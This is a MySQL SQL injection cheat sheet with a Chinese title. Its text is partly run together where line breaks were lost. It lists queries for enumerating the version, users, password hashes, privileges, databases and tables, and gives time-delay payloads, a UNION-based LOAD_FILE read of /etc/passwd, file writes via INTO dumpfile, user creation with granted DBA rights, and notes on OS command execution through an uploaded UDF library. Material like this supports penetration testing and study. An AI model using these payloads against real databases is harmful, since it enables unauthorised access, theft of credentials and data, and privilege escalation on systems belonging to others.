MySQL SQL 常见注入脚本

VersionSELECT @@versionComments SELECT 1; #comment
SELECT /*comment*/1;Current User SELECT user();
SELECT system_user();List UsersSELECT user FROM mysql.user; -- privList Password HashesSELECT host, user, password FROM mysql.user; -- privPassword CrackerJohn the Ripper will crack MySQL password hashes.List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs 

SELECThost, user, Select_priv, Insert_priv, Update_priv, Delete_priv,Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv,File_priv, Grant_priv, References_priv, Index_priv, Alter_priv,Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; --priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECTtable_schema, table_name, column_name, privilege_type FROMinformation_schema.column_privileges; -- list privs on columns 

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; 

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

Current Database SELECT database()List DatabasesSELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- privList Columns SELECTtable_schema, table_name, column_name FROM information_schema.columnsWHERE table_schema != 'mysql' AND table_schema != 'information_schema'List TablesSELECTtable_schema,table_name FROM information_schema.tables WHEREtable_schema != 'mysql' AND table_schema != 'information_schema'Find Tables From Column NameSELECTtable_schema, table_name FROM information_schema.columns WHEREcolumn_name = 'username'; -- find table which have a column called'username'Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char SELECT substr('abcd', 3, 1); # returns cBitwise AND  SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT char(65); # returns AChar -> ASCII ValueSELECT ascii('A'); # returns 65CastingSELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);String ConcatenationSELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC

If Statement

SELECT if(1=1,'foo','bar'); -- returns 'foo'Case StatementSELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns AAvoiding Quotes SELECT 0x414243; # returns ABCTime Delay  SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
Make DNS RequestsImpossible?Command Execution

Ifmysqld (<5.0) is running as root AND you compromise a DBA accountyou can execute OS commands by uploading a shared object file into/usr/lib (or similar).  The .so file should contain a User DefinedFunction (UDF).  raptor_udf.cexplains exactly how you go about this.  Remember to compile for thetarget architecture which may or may not be the same as your attackplatform.

Local File Access...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file systemHostname, IP AddressImpossible?Create UsersCREATE USER test1 IDENTIFIED BY 'pass1'; -- privDelete UsersDROP USER test1; -- privMake User DBAGRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- privLocation of DB filesSELECT @@datadir; Default/System Databasesinformation_schema (>= mysql 5.0)
mysql